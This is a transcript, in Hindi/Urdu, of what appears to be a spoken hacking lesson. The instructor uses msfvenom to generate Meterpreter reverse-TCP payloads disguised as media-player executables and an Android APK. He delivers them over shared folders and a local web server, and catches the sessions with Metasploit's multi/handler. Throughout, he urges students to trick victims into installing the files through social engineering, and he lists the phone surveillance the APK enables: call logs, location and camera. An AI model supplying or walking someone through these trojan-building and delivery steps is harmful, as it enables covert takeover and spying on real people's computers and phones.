जी अस्सलाम वालेकुम जी, मेरी आवाज़ सबको आ रही? नेटवर्क हमारा वही है विंडोज 7 151 और मेरा आईपी है 145। लास्ट इस पे बात हो गई थी कि हमने वल्नरेबिलिटी निकाली थी इटर्नल ब्लू और पिक्चर बहुत कम आई और मैंने आपको बताया था ब्लू की, मैं क्रीपर कह रहा था इसको, ब्लू की वल्नरेबिलिटी है वो जो आरटीपी प्रोटोकॉल 3389 पे है, वो भी आप एक्सप्लॉइट कर सकते हैं। एमएस वर्जन एक तो और भी हैं एसएमबी के, तो लेकिन आई अज्यूम कि हमारे पास अब ऐसी मशीन है जैसे मैं कहता हूँ जी विंडो 7 लेट्स सपोज उसमें वल्नरेबिलिटी नहीं है या उसने कोई फोल्डर ही शेयर नहीं किया तो कोई वल्नरेबिलिटी उसमें नहीं होगी, उसको फिर कैसे हैक करेंगे? तो उसके लिए आप एक मिनट दीजिएगा मुझे जी, एक मिनट। चलें जी बिस्मिल्लाह करते हैं। तो बात मैंने स्टार्ट की कि अब ऐसे हमारे पास मशीन है जिसकी कोई वल्नरेबिलिटी नहीं है। मैं 7 से स्टार्ट करूंगा फिर विंडो 10 पे जाऊंगा। तो क्या करें, उसको मैं किस तरह से फिर हैक कर सकता हूं? तो उसके लिए हम खुद रैट बनाते हैं। उसके लिए हम पेलोड बनाएंगे। कौन सा पेलोड? मैंने आपको बताया था मीटर प्रिंटर रिवर्स अंडरस्कोर टीसीपी। ये पेलोड अगर आप कोई टेक्स्ट में या कोई पिक्चर में छुपा दें तो उसके लिए वल्नरेबिलिटी होना जरूरी नहीं है। आप इसको किसी तरह से सोशल इंजीनियरिंग के जरिए से पहुंचा देते हैं विंडोज की मशीन पे, तो अगर वो आपकी इस एग्जी को इंस्टॉल करता है या उस पिक्चर को क्लिक करता है तो पीछे से आपका जो ये पेलोड है ये एक्टिव हो जाएगा। और ये क्या करेगा? वही काम जिसको मैंने आपको पहले बताया। ये आपकी जो होस्ट मशीन है, लेट्स सपोज ये मशीन है, अब आप यहाँ बैठे हैं, आप इसको मुसलसल स्कैन करने की कोशिश कर रहे हैं और ये मशीन कह रही है नो वल्नरेबिलिटी। फिर आपने यहाँ पे क्या किया? आपने यहाँ पे पेलोड डिजाइन किया और उसके अंदर मीटर प्रिंटर का सेशन छुपाया, उसको एक्सटेंशन दे दी .exe और .exe सॉफ्टवेयर का नाम कुछ भी रखा, किसी भी तरह से आपने वो यहाँ पे भेज दी .exe की जो फाइल थी वो आपने जब यहाँ भेजी। अब इसके ऊपर आपने क्या पिक्चर लगाई? बेटा खामोशी से जाओ। इसके ऊपर आपने क्या पिक्चर लगाई, कौन सी सॉफ्टवेयर लगाया? तो वो आपके सोशल इंजीनियरिंग आर्ट पे है। अब जिसने भी इस सॉफ्टवेयर को इंस्टॉल करने की कोशिश की, इसके अंदर क्या छुपा हुआ है? मीटर प्रिंटर। और मीटर प्रिंटर जब आप मैनुअली बनाएंगे तो उसको आप क्या भेजेंगे कि जब तुम्हें कोई क्लिक करे तुमने वापस सेशन बना देना है मेरे साथ, मेरे किसी भी पोर्ट पे जो हम मीटर प्रिंटर के अंदर छुपाएंगे। तो इसको कैसे करते हैं?
वेरी सिंपल। इसको हम करते हैं जनाबे वाला। मैं यहाँ पे एक फोल्डर बना देता हूँ, इसका नाम रख देते हैं लेट्स सपोज एक्सी नाम का। इसके अंदर चले जाते हैं, देखते हैं एम्प्टी एक फोल्डर है। यहाँ पे मैं कमांड देता हूँ msf venom। msf venom ये सिस्टर कमांड है msf टूल की। बाकी रैट बनाने के लिए आपको टूल्स बहुत मिलेंगे गिट पे, हंड्रेड्स ऑफ टूल मिलेंगे जो आपको बताएंगे कि जी हम अनडिटेक्टेबल पेलोड बनाते हैं या रैट बनाते हैं। इसके सिंटेक्स में है जी msf venom -pp फॉर पेलोड। विंडोज का मीटर प्रिंटर रिवर्स अंडरस्कोर TCP ये पेलोड। स्पेलिंग मिस्टेक से बचना हो तो एक दफा चाहे आप यहाँ पे जरा चेक करके देख लें, सेट पेलोड और शो पेलोड। ओहो ये तो फिर सारे दिखा देगा। चलो सारे दिखाएगा तो यहाँ पे मैं देख लेता हूँ स्पेलिंग ठीक ही है विंडोज और मीटर प्रिंटर ये ऊपर चला गया होगा। सर्च विंडोज मीटर प्रिंटर ये आ रहा है जी विंडोज का पेलोड। ये x86 की जरूरत नहीं है, नॉर्मल बना लें रिवर्स अंडरस्कोर TCP। ये जी विंडोज मीटर प्रिंटर और रिवर्स TCP ये भी कोई और पड़ा हुआ है, मैंने स्पेलिंग ठीक ही लिखे हैं। चलो जी किसी भी क्लियर हो जाओ बैग खच पाओ। ये लें जी msf venom /windows मीटर प्रिंटर रिवर्स अंडरस्कोर TCP। इसके बाद मैं इसको कहता हूँ जी lhost इक्वल लोकल होस्ट 192.168.0.145 ये मेरा अपना IP है। ये देखें ये मेरा अपना IP है। आप ये MSF के अंदर लोकल कमांड्स भी चला सकते हैं सिस्टम की। और L पोर्ट में कह देता हूँ जनाब टेट्रा 5 तो -O फॉर आउटपुट। किस शक्ल में हो आउटपुट? एक्सी में कि इसको इस पेलोड को छुपाना है, इसकी क्या बनानी है एक्सी। और किस नाम की बनानी है, मैंने उसको कह दिया मीडिया विन media.exe विंडो मीडिया, कोई भी आपने नाम देने की कोशिश की। तो लें जनाब उम्मीद है कमांड में बिल्कुल ठीक लिखी होगी, स्पेलिंग मिस्टेक भी नहीं है। ठीक है, अब ये मैंने छुपा दिया इसमें। ले जनाब वो कहता है मैंने काम कर दिया और LS किया तो क्या काम किया इसमें है आउटपुट एक्सी नाम की बनाई है इसने डैश को, क्या था आउटपुट -F
मैंने भी यूज किया था। अच्छा जी, डैश F ये यूज कर सकते हैं, डैश F और ये सिंटैक्स यूज कर लें जी। फाइल टाइप क्या हो, एक्जी, और उसकी जो आउटपुट है मैं रीडायरेक्ट कर रहा हूँ इस फाइल के अंदर। तो वैसे उसने ये भी बना दिए, ये भी चलेगा, लेकिन मुझे ये नाम चाहिए। डैश एफ मीन फाइल, फाइल टाइप मैंने कहा एक्जी। आप यहाँ पे लिनक्स के लिए यूज कर सकते हैं, और जब विंडोज के लिए, मोबाइल के लिए होगा तो यकीनन मैं मोबाइल विंडोज का फिर पेलोड नहीं छुपाऊंगा, उसके लिए मैं फिर एंड्रॉयड का या आईफोन का पेलोड छुपाएंगे। चलें जी, ये मेरे पास india.exe की फिर भी आप देख सकते हैं फाइल की इसके नीचे फाइल कमांड से फीचर चेक कर लें, वो आपको बता रहा है कि ये एग्जीक्यूटेबल और विंडोज, इस फाइल की टाइप क्या है कि ये एक्जी बनी हुई है, और ये किसके लिए है, ये विंडोज की एक्जी है। अब इसको आपने पहुंचाना है किसी तरह से क्लाइंट तक। अब इसमें सोशल इंजीनियरिंग काम आएगी कि क्लाइंट तक आप इसको पहुंचाते कैसे हैं। तो अब क्लाइंट अगर इस पर क्लिक करेगा तो ले जनाब, ये मैंने बना लिया। अब इसको कैसे पहुंचाते हैं, मैं तो सिंपली उस मशीन को डायरेक्ट एक्सेस करके उसमें रखता हूँ। आपने इसको व्हाट्सएप भेजना है, इसको किस तरह से भेजना है, कौन सा माहौल बनाना है, उस पर मैं आपको कह चुका हूँ, वो सोशल इंजीनियरिंग आर्ट है। तो इसके अंदर मैं चला जाता हूँ, इसमें आप एसएमबी का हमने कोई कनेक्शन बनाया था पहले, इसको एडिट कर लें जरा, 0.151 ये लें जी। इसमें एक डेटा का फोल्डर शेयर है वहां पे विंडोज 7 में, जहाँ पर मैंने खाली फोल्डर रखे थे। तो हम क्या करते हैं, हमने किधर बनाया है, हमने बनाया है जनाब रूट के ऊपर, किस में, एक्जी फोल्डर में। और ये मैं करता हूँ यहाँ से कॉपी, और इसको पेस्ट कहाँ करते हैं, डेटा फोल्डर के अंदर। अब उम्मीद रखूंगा इसमें आपको कंफ्यूजन नहीं होनी चाहिए कि मैंने ये किस तरह से फोल्डर पहुंचाया वहां तक। ये विंडोज की बेसिक सी शेयरिंग थी। ये लें जी, बस ये याद रहे जब आपने फोल्डर शेयर करना है यहाँ से, तो आपकी परमिशन जब मैं शेयर करता हूँ, नहीं तो वहां से वो राइट ही नहीं करने देगा। जब आप इसको शेयर करें तो इसकी परमिशन याद रखिएगा, आप इसको फुल कंट्रोल कर दीजिएगा फॉर एवरीवन। और इवन इधर से भी जो इसकी परमिशन है यहाँ से चलें वो आ रही है, एडमिन फॉर एवरीवन, वहीं से कर दिया, काफी है, हो गया। चलें जी, डेटा के अंदर में जाता हूँ। यहाँ पे अगर आप देखें तो एक एक्जी पड़ी है, इसको मैं बाहर ले आता हूँ सिस्टम पे, ये पड़ी हुई है, लग ऐसे रहा है कोई विंडो मीडिया प्लेयर की कोई एक्जी है। इवन आप इसको, इसकी प्रॉपर्टीज देखें तो ये आपको बताता है कि ये जनाब कोई एक्जी एप्लीकेशन है। इसके ऊपर आइकन उकन भी लग सकते हैं, तो फिलहाल तो ये सिंपल एक्जी दिखा रहा है। तो ठीक है, अब इसको आप डबल क्लिक करें। इसके अंदर क्या छुपा हुआ है, इसके अंदर छुपा हुआ है पेलोड, और वो पेलोड क्या कह रहा है मैं पेंट पे दिखाता हूँ आपको।
इसके अंदर पेलोड छुपा है, आप इसको क्लिक करेंगे तो ये आपको कनेक्ट करवा देगा इस मशीन से 145 से। अब सवाल ये है कि ये 145 से जब कनेक्ट कराएगा किस पोर्ट पे, आई थिंक टेट्रा 5, ये मैंने पोर्ट दी थी, इस पोर्ट पे कनेक्ट करवाएगा। तो क्या आपने ये पोर्ट यहाँ पे ओपन रखी हुई है, ये टेट्रा 5, ताकि ये जब आए तो कनेक्ट हो सके? तो देख लेते हैं। यहाँ पे मैंने किया ओपन टर्मिनल, नेटस्टेट -80 np एंटर। यहाँ चेक करें कहीं पे टेट्रा 5 पोर्ट ओपन है, नथिंग, कहीं पे भी नहीं है। तो वो कैसे ओपन होगी? वो ओपन होगी जनाबे वाला, ये क्या मतलब है? हमने दो ओपन किया हुआ है। इसको करते हैं एग्जिट और इसको सीधा ही एग्जिट कर देते हैं। तो अब यहाँ पे आपको पेलोड लोड करना पड़ेगा एक। अब तवज्जो से समझिएगा ये बात। कितने दोस्त हैं आज? कुछ लोग छुट्टी पे, फर्स्ट रमजान है और तो लें जनाब। चले मैं हवाई क्वेश्चन करता हूँ, आंसर करने की कोशिश करें। जब मैंने लास्ट टाइम वल्नरेबिलिटी सर्च की थी तो उस वक्त पेलोड कौन सा यूज किया था? जो वल्नरेबिलिटी थी इटर्नल ब्लू, तो उसका पेलोड भी लोड हुआ था जो कि हमने यूज किया था। पेलोड सॉरी एक्सप्लॉइट, यूज एक्सप्लॉइट वो था जनाबे वाला विंडोज का एसएमबी का MS-17 इटर्नल ब्लू, ये था। तो वो तो क्योंकि वल्नरेबिलिटी थी विंडोज के अंदर, इसलिए हमने ये पेलोड यूज किया था। अब कोई वल्नरेबिलिटी तो नहीं है, अब तो उस मशीन के ऊपर हमने पेलोड छुपा के भेजा हुआ है। जब आप पेलोड छुपा के भेजते हैं तो उस केस में फिर यहाँ पे आप जो एक्सप्लॉइट यूज करते हैं वो होगा यूज एक्सप्लॉइट मल्टी हैंडलर, ये है। फिर आप ये यूज करेंगे मल्टी हैंडलर पेलोड। मैं तीसरी बार फिर गलत वर्ड यूज कर रहा हूँ, मल्टी हैंडलर एक्सप्लॉइट। जिसके अंदर पेलोड यूज होगा विंडोज जो आपने छुपा के भेजा हुआ है। सेट पेलोड कौन सा जी? विंडोज मीटर प्रीटर रिवर्स अंडरस्कोर TCP। फिर आप करेंगे जनाब सेट L होस्ट 192.168 कैपिटल या लोअर चलेगा, और सेट L पोर्ट। अब आप लोग जरा सबूत दें जागने का, बताएं कि L पोर्ट कौन सी सिलेक्ट होगी? कोई भी कर लें। क्यों जवाब भाई? ये 555 क्यों? टेट्रा 5 किस लिए? आंसर ठीक है, बिल्कुल ठीक है, वेरी गुड। लेकिन क्यों? इसका रीजन क्या समझ आता है? हाँ, एक्चुअली आपने जो एक्जी बना के भेजी है उसके अंदर रिवर्स मीटर प्रीटर सेशन को आपने कह के भेजा है कि
दूसरी मशीन को मेरे पास भेजना तो इस पोर्ट पे भेजना। इसमें हमने आर पोर्ट सेलेक्ट किया था, आर पोर्ट रिमोट पोर्ट और रिमोट होस्ट, ये दिखा भी देता हूँ किस कमांड से हमने वो किया था। ये हमने बनाया लोकल होस्ट, एक मिनट, एल होस्ट यही है, ठीक है, एक मिनट एल होस्ट या आर होस्ट आएगा, यहाँ आर पोर्ट, इसमें आएगा जनाब आर होस्ट, एल होस्ट नहीं, ये मैंने यहाँ गलत दिया है क्योंकि ये जब छुपा है, जब इसको जब भी कोई क्लिक करेगा तो ये किस मशीन से इसने कनेक्ट होना है, एल लोकल नहीं, क्योंकि एल पोर्ट लोकल पोर्ट ये तो लोकल के लिए होता है, रिमोट होस्ट इसमें देना पड़ेगा कि इसने किस से कनेक्ट होना है। इवन भूल तो नहीं रहा मैं, एक मिनट, रिमोट एल होस्ट आता तो यही है, मुझे थोड़ी सी एक और जहन में सवाल पैदा हो गया आपको मैं असल में, चलें ठीक है, एल होस्ट वो उसका लोकल होस्ट वो उसकी तरफ चलेगा, उसके लोकल पोर्ट पे ये कनेक्ट करेगा, ठीक है, तो एल पोर्ट भी इसकी लोकल पोर्ट ये, और इसको करते हैं रन। ये देखें, अब ये आपके मशीन के ऊपर इस पोर्ट पे ये इसने ओपन कर दिए, आप अब अगर आउटपुट देखें जो कि ये देखें ओपन है, लेकिन कोई सेशन स्टैब्लिश नहीं है, ये लिसन कर रहा है, सेशन कोई स्टैब्लिश नहीं है। अब ये इंतजार कर रही है आपकी मशीन, अगर उस बंदे ने इस सॉफ्टवेयर पे क्लिक किया तो ये किस तरफ जाएगा, इसका एल होस्ट क्या है, इसका एल होस्ट है 192.168.0.145। मैंने इसको जैसे क्लिक किया तो क्योंकि ये एक फेक एक्सी है, ये हमें घुमा के बस चुप हो गया, मुझे लगा ये क्या है, ये तो मजा नहीं आया, पता नहीं सॉफ्टवेयर खराब है क्या है, मैं जो भी सोचता रहा। लेकिन आप जरा इधर आए देखें यहाँ क्या हुआ, विंडोज 7 पे उसने सिर्फ इसको डबल क्लिक किया है, कोई सॉफ्टवेयर नहीं इंस्टॉल हुआ। लेकिन अगर आप यहाँ आए तो देखें, यहाँ आपका काम हो गया, यहाँ मीटर प्रीटर सेशन बन गया, ये चेक करें जरा, इस वक्त आप विंडोज 7 के अंदर है, विंडोज 7 को आपने एक्सेस कर लिया, तो बाकी वही है। अब इसको एक्सेस करने के बाद अब आप क्या कर सकते हैं, उस पर मैंने प्रीवियस बताया था, इवन आप शेल ले लें उसका, फिर जितना ज्यादा आपको विंडोज की कमांड्स आती हैं उतना ही आप विंडोज के ऊपर रिमोटली कंट्रोल ले सकते हैं। अब यही फोल्डर, सॉरी यही एक्जी मैं भेजने की कोशिश करता हूँ विंडो 10 के ऊपर, यही एक्जी मैं भेजने की कोशिश करता हूँ विंडो 10 पे, देखते हैं वहां से क्या रिस्पॉन्ड आता है। विंडो 10 का आईपी है जी 178, विंडो 10 का आईपी है 178,
और मैं देखता हूँ कि विंडो 10 ने भी शायद फोल्डर शेयर किया होगा। यहाँ पे हम लिखते हैं 0.178। वहां पे भी बहुत कुछ शेयर है। और यूजर एडमिन के अंदर डेस्कटॉप, मैं डेस्कटॉप पे चलें टेस्ट फोल्डर के अंदर, डेस्कटॉप पे टेस्ट फोल्डर के अंदर पेस्ट करने की कोशिश करता हूँ, जो कि मैंने ये winmedia.exe चेक करें जरा। मैंने डेस्कटॉप पे पेस्ट किया था टेस्ट फोल्डर में। किधर गया टेस्ट फोल्डर? ओपन हो जाए, ये पड़ा हुआ ना। तो अच्छा, इतनी देर भी कमाल है कि अगर आ गया। ये भी इस वजह से है कि इसमें ब्राउजर सिक्योरिटी शामिल नहीं है। ये मेरे लिए हैरान कुन बात है कि इतनी देर विंडोज ने इसको रख लिया। और मैं देखता हूँ अगर विंडो 10 भी इससे सेशन देता है तो ट्राई मारते हैं। ये लें जी, देखें जरा। विंडो 10 को तो वैसे इसे अभी डिलीट कर देना चाहिए था, मेरे ख्याल अभी कर देगा ये। वो कहता है जी मैं इस फाइल पे क्लिक नहीं करने दूंगा। ये देखें, बार बार विंडो डिफेंडर, विंडो सिक्योरिटी, थ्रेड्स फाउंड, माइक्रोसॉफ्ट डिफेंडर एंटी वायरस फाउंड थ्रेड्स। और अगर आप इसको थोड़ा सा चलाएं तो ये आपको एग्जैक्ट लोकेशन भी बताएगा, क्विक स्कैन, और ये आपको बता देगा। अगर वो स्कैन ना भी करे तो, लेकिन ये वो देखे गुम हो गया, डिलीट कर दिया इसने। विंडो 10 ने हमारे जो पेलोड था उसको लिफ्ट नहीं कराई। और अगर किसी तरह से मैं उसके ऊपर पेस्ट करने में कामयाब हो भी गया। अच्छा, एक इंटरेस्टिंग बात और भी दिखाऊं आपको। मैंने अगर कोई वेब के थ्रू भेजने की कोशिश की ना, अब ये वेब सर्वर में ना उलझेगा। जिन्होंने वेब सर्वर पढ़ा हुआ है उनके लिए तो ये बात मसला नहीं होगी, लेकिन जिन्होंने नहीं पढ़ा वो तो शायद जरा इसको अजीब समझें। मेरे पास ये पढ़ा हुआ, मैं कॉपी कर लेता हूँ इसकी। वार www.html डेटा के फोल्डर में, यहाँ पे किस नाम से है जी, winmedia.exe। ये मैं बिल्कुल उन बच्चों को नहीं बता रहा जो उन्होंने वेब सर्वर नहीं पढ़ा हुआ, बस ये वेब वालों जिन्होंने वेब सर्वर पढ़ा है उनके लिए होगा। तो मैं यहाँ पे आईपी देता हूँ अपने लाइनक्स की मशीन का डेटा के फोल्डर में, जहाँ पे मैंने वहां पे ये पेलोड रखा है। आप जरा चेक करें। बल्कि वहां पे मुझे सर्विस भी स्टार्ट करनी पड़ेगी, कौन सी, वेब की। और यहाँ पे वेब की सर्विस होती है सिस्टम कंट्रोल रीस्टार्ट अपाचे 2 रिस्टार्ट कर दें। और डेटा के फोल्डर पर www.html डेटा में मैंने ये रख दिया। अपाचे ने थोड़ा सा टाइम लिया। ये लें जी, ये पड़ा हुआ है win.exe। ये ब्राउजर के थ्रू मैं इसको देखिएगा जरा डाउनलोड करने की कोशिश करता हूँ। इसमें साथ ही पढ़ लिया। ये तो डाउनलोड ही नहीं होने दे रहा। अब जितनी कोशिश करें इसने डाउनलोड ही नहीं होने देना। मैंने पहले डायरेक्ट किसी फोल्डर के ऊपर पेस्ट किया था तो पेस्ट हो गया था, लेकिन साथ ही उसने फिर डिलीट कर दिया था। इसको कहते हैं विंडोज की जो सिक्योरिटी है, रियल टाइम वायरस प्रोटेक्शन। खासतौर पे ये अगर बंद कर देना फिर कुछ गुजारा हो जाता है। ये अगर आप बंद कर दें तो, और इसको कतअन बंद आपने नहीं करना। मैं तो इसको नो ही कहूंगा, मैंने इसको बंद नहीं करना। तो फिर क्या करें अगर इस तरह सिचुएशन है? इसका मतलब फिर तो विंडो 10 बच गई। काबिले तारीफ है विंडो 10 की जो
स्कैनिंग है, काबिल तारीफ है। विंडोज 7 तो 2 मिनट में हमारे हाथ आ गई। पहले तो हमने उसको डायरेक्ट हाथ मारने की कोशिश की, फिर हमने कोई पेलोड बना लिया। अब आते हैं अगले टॉपिक पे। ये मैं जल्दी से दोहरा देता हूं जो मैंने किया, क्योंकि इसमें मैंने वेब भी इन्वॉल्व किया, तो उसमें शायद आप कंफ्यूज हुए होंगे। हमने सबसे पहले एक पेलोड बनाया। मैं यहाँ पे इसको बैक करता हूँ, कंट्रोल Z करते हैं, सेशन किल कर देते हैं जो भी बना हुआ है। आप देख लें हमारा मीटर का कोई सेशन नहीं है, मैंने बैक कर दिया, कोई भी सेशन नहीं है। और विंडोज 7 पे जाके ये जो फाइल थी ये भी डिलीट कर देता हूँ, फिर बनाते हैं यही लैब 2 मिनट में दोबारा करते हैं। MSF Venom -PP for interpreter, P for payload, Windows interpreter, reverse underscore TCP, इसके अंदर हेलो होस्ट, जब इस पे क्लिक किया जाए तो ये किसकी तरफ भागे, ये भागे 192.168.0.2 बल्कि 145 की तरफ। और एल पोर्ट इसकी किस पोर्ट पे, 1234 पे। और फाइल किस नेचर की फाइल बनाए, एक्सी, और आउटपुट कहाँ डाल दे, माई player.exe। ये लें जी, मैंने न्यू नाम से एक ये लें जी, ये पड़ा हुआ है एम प्लेयर, बल्कि मैं जो पुराना बनाया है इसको रिमूव करता हूँ। एम प्लेयर को मैं कॉपी कर लेता हूँ, पेस्ट कर देता हूँ विंडोज 7 की मशीन में। ये डेटा, और यहाँ पे अदर लोकेशंस के अंदर कंप्यूटर एक्सी के अंदर था, इसको करते हैं कॉपी और इसको डेटा में पेस्ट करते हैं। चले जाते हैं यहाँ पे डेटा में और ये डेस्कटॉप पे रखते हैं। अब मैं इसको डबल क्लिक करूंगा, कर दो। इसके डबल क्लिक करने पे क्या होना है, अब यहाँ पे खाली लाइनक्स में आए, अपना मीटर का सेशन देखा, कुछ भी नहीं है, क्योंकि यहाँ पे आपने एक तरह से वेट ही नहीं किया हुआ था उसका, और उसके लिए एक पूरा जो सेटअप तैयार होना चाहिए वो तैयार ही नहीं था। तो यहाँ पे भी आप इंतजार करें ना अपने मीटर सेशन का, तो उसके लिए आपने यूज करना है एक्सप्लॉइट मल्टी हैंडलर, और सेट कर लें उसके अंदर पेलोड विंडोज मीटर आ जाओ, मीटर रिवर्स अंडरस्कोर TCP
सेट एल होस्ट और सेट एल पोर्ट। अब हमारी एल पोर्ट 1 2 3 4 3 रन। ये रेंज आप रन कर रहे हैं, इंतजार कर रहे हैं आप। अब अगर उसने क्लिक किया तो अब वहां पे इंतजार हो रहे हैं। ये देखें, इस भाई साहब ने क्लिक किया और दूसरी तरफ अगर आप देखें तो आप तो वैसे ही स्पॉट पे इंतजार कर रहे थे, तो ये भाई साहब आ गए आपकी तरफ, आपकी पोर्ट पे। लेकिन बात वही है कि ये भाई साहब अभी तक आपके पास आ तो गए, लेकिन ये विंडो 10 पे नहीं चल रहा ये काम, विंडो 10 पे नहीं चल रहा। तो फिर क्या करें? ये 8 पे चल जाएगा, 7 पे चल जाएगा। विंडो 10 ने आपके इस तरह के जो पे लोड हैं, जो रैट हैं, उनको ठुडा मार देना। किसी तरह से आपने पेस्ट कर दिया, वो पेस्ट हो जाएंगे, लेकिन डबल क्लिक करेंगे वो चलेंगे नहीं, तो फिर क्या फायदा होगा? तो फायदा हम देख लेते हैं, अभी देख लेते हैं। इस सेशन में किल करता हूं और कोई सेशन नहीं है। अब आते हैं यहाँ पे। अब ये जो मेरे पास पे लोड पड़ा है विंडोज 7 की हद तक तो ठीक है, लेकिन ये विंडो 10 को नहीं करने दे रहा। अब एक लैब देता हूं इस पे आपको, इंटरेस्टिंग लैब है। अगर नहीं करेंगे तो फिर इसका मतलब है फजूल है, जितना हम पढ़ा रहे हैं वो भी फिर आपके लिए किसी काम का नहीं है। मोबाइल हैक करने का बड़ा शौक रहता है लोगों को। पूरा पूरा सिंटेक्स बता रहा हूँ। मोबाइल हैक के केस में जहां पे एंड्रॉयड दे रहे हैं, यहाँ पे विंडोज के बजाय यहाँ एंड्रॉयड लिखेंगे, इंटरप्रेटर रिवर्स, ये बिल्कुल ठीक रहेगा। फाइल टाइप मैंने देखा है अक्सर यहाँ पे एक इशू रहता है, एक सॉफ्टवेयर रहता है आपका ईपीके टूल, वो अगर इंस्टॉल ना हो तो प्रॉब्लम आते हैं। तो इसका बेहतरीन तरीका ये है कि आपने यहाँ कोई टाइप देनी नहीं, सीधा सीधा आप कह दीजिएगा जी लेट्स पुट प्लेयर, प्लेयर डॉट एक्जी के बजाय एपीके, प्लेयर डॉट एक्जी के बजाय एपीके। ये लें जी, मैंने एंटर किया। मैं आपको ये एक्सेस करके दिखा ही देता हूँ, हवा में नहीं छोड़ते। ये लें जनाब, फाइल प्लेयर डॉट एपीके, वो बता रहा है कि जनाब ये एक जिप आर्काइव टाइप बनाया है, वो उसकी एपीके आर्काइव बता रहा है जी। तो ठीक है, अब ये एपीके मैं सिंटैक्स चेक कर लूँ, ठीक था बिल्कुल। एंड्रॉयड इंटरप्रेटर रिवर्स ठीक है, बेहतरीन। अब ये आप भेजेंगे मोबाइल के ऊपर। अब मोबाइल पे ये इंस्टॉल करना है। किस तरह इंस्टॉल करवाते हैं वो आपको पता है। मोबाइल पे अपने प्ले स्टोर के अलावा अगर आप कोई ऐप इंस्टॉल करते हैं तो वो मोबाइल भी आपको रिकमेंड करता है कि इस तरह ना करो, ये बेहतर नहीं है। लेकिन उसमें बार बार कह रहा हूँ, उसमें सोशल इंजीनियरिंग काम आती है कि किस तरह से आप माहौल बनाते हैं कि वो आपकी एपीके को इंस्टॉल कर ले। इंस्टॉल कर लिया, अब यहाँ पे क्या करें? यहाँ पे सिंपल यूज एक्सप्लॉइट वही मल्टी हैंडलर सेट पेलोड। कौन सा पेलोड? एंड्रॉयड
हर 2 मिनट बाद मुबारकबाद ही आ रहा है। खैर मुबारक ही आप। तो ये लें जी एंड्रॉयड मीटर प्रिंटर रिवर्स अंडरस्कोर टीसीपी। विंडोज के केस में यहाँ पे विंडोज का मीटर प्रिंटर लोड किया था, अभी एंड्रॉयड का है। सेट एल होस्ट 192.168.2.4 सेट एल पोर्ट, कौन सी एल पोर्ट हमने रखी है यहाँ पे 1 2 3 4 1 2 3 4 रन। अभी इंतजार कर रहा है किसी मोबाइल के ऊपर आपकी ये एपीके जब कोई क्लिक करेगा इंस्टॉल करने के बाद तो आपके मोबाइल शरीफ ने यहाँ होना है। तो कर लेते हैं। अब मैं मोबाइल पे ये कैसे भेजता हूँ, तो मोबाइल पे भेजने का तरीका सिंपल है। मैं कॉपी करता हूँ इस प्लेयर डॉट एग्जिट को, कहाँ पे var www.html डेटा के फोल्डर में। सिस्टम कंट्रोल रीस्टार्ट अपाची 2। अब जिन्होंने वेब सर्वर नहीं भी पढ़ा, var www.html होता है डेटा मैंने खुद बनाया है। तो ये फोल्डर बेसिकली अपाची 2 की सर्विस स्टार्ट करने पे वैसे शेयर हो जाता है और इसको आप इस तरह से फिर ओपन करते हैं। आपका जो भी आईपी है आखिर में डेटा, जैसा कि मैंने यहाँ करके दिखाया था आपको। ये देखें अभी वो डॉट एपी के ए वाला पड़ा है और नहीं है। इसको दोबारा अगर आप ओपन करें तो ये देखें आपका वो आ गया एपी के, कहाँ पे है प्लेयर, ये प्लेयर एपी के। लेकिन सीन ये है कि एक मिनट ठीक बना है ये TU-HS प्लेयर एपी, हाँ जी 12 के है, सही है। हाँ लें जनाब, मैंने इसको, मैं अपने मोबाइल पे, ज़ाती मोबाइल है इसी पे इसको एक्सेस कर लेता हूँ ताकि ये हुज्जत भी रहे कि हमने मोबाइल भी करके देखा था। मैं आईपी देता हूँ जी 192.168। इसमें आईपी है हमारा 0.145। ये लें जी। क्या बात है, मेरे सामने तो आ गया। यहाँ पे मैं आपको नेट स्टेट करके दिखाता हूँ। यहाँ देखें मेरी कोई 1 2 3 पोर्ट ओपन है इस मशीन पे, लेकिन उसके साथ कोई भी कनेक्टेड नहीं है। तो और ये भी वेट कर रहा है अपनी 1 2 3 पोर्ट पे। तो हम कर लेते हैं कनेक्टेड। अभी मैं पहले से मेरे पास अगर एक ऐप इंस्टॉल थी तो मैं रिमूव कर दूं। तो ये एपीके मैं अपने मोबाइल पे इंस्टॉल करने लगा हूँ। सर अगर पेलोड के जरिए हम सिस्टम हैक कर लेते हैं फिर उसके बाद हम अपनी कमांड वगैरह क्लोज कर देते हैं सब कुछ, अगर दोबारा मैं उसका देखना चाह रहा हूँ सिस्टम से फिर को दोबारा कमांड लिखनी पड़ेगी। मैं आता हूँ, रेजिस्टेंस बताता हूँ आपको, वेट करें थोड़ा सा। चलें जी, मैंने वो लिंक जो था ये HTTP वाला, ये मैंने अपने मोबाइल पे दिया है। मेरे गले में थोड़ा सा पेन है आज, मैं बड़ा स्लो करके बोल रहा हूँ, तो गुजारा करें। फिर मैंने अपने ब्राउजर में यही लिखा
बाद फाइल डिलीट कर देता। एक मिनट में बताता हूँ प्रोसेसिंग कैसे। http:// जो मेरा IP था /data, ये मैंने ब्राउजर में लिखा है अपने, वो मेरे सामने है ये player.apk। अब मैं इसको अगर इंस्टॉल करने की कोशिश कर रहा हूँ तो मुझे मैसेज तो आया यहाँ पे कि बेहतर नहीं है कि आप कोई बाहर से डायरेक्टली कॉल नंबर और मेन एक्टिविटी, तो मुझे कहता है बेहतर नहीं है कि आप ये ऐप इंस्टॉल करें। मैंने कहा नहीं, इंस्टॉल कर दें। तो लें जी, मैंने इसको इंस्टॉल कर दिया अपने मोबाइल पे। तो this app is built for older version for Android, doesn't include the latest privacy protection. मैंने इंस्टॉल एनीवे। बस मुझे जिसको कहते हैं, जानू ने कहा था ये जब तक ये ऐप इंस्टॉल नहीं करेंगे मैं आपका फोन नहीं उठाऊंगी। तो ले जनाब, मैंने तो इंस्टॉल कर दिया। इंस्टॉल करने के बाद मैंने इसको जैसे किया ओपन, जरा चेक करो, सिस-इन्फो, ये मोबाइल शरीफ मेरा आपके सामने है। अब मैं ना आपको फोन नंबर दिखाऊंगा इस पे, ना मैं अपना वेब कैमरा दिखाऊंगा। ये हेल्प करके आप धड़ाधड़ चीजें देख सकते हैं। आप अपने कॉल लॉग्स, ये नंबर डंप कर सकते हैं, जियो लोकेशन निकाल सकते हैं, इवन कुछ ऐप अब बैठ के इंस्टॉल भी कर सकते हैं, ऐप कोई अनइंस्टॉल भी कर सकते हैं, मजीद खतरनाक एप्लीकेशन। तो ये इस वक्त ही मोबाइल आपके कंट्रोल में है। तो ये भी मैंने फिर सेशन ये कर दिया। दो चीजें हो गई। इसका तो बड़ा सिंपल है, इसने 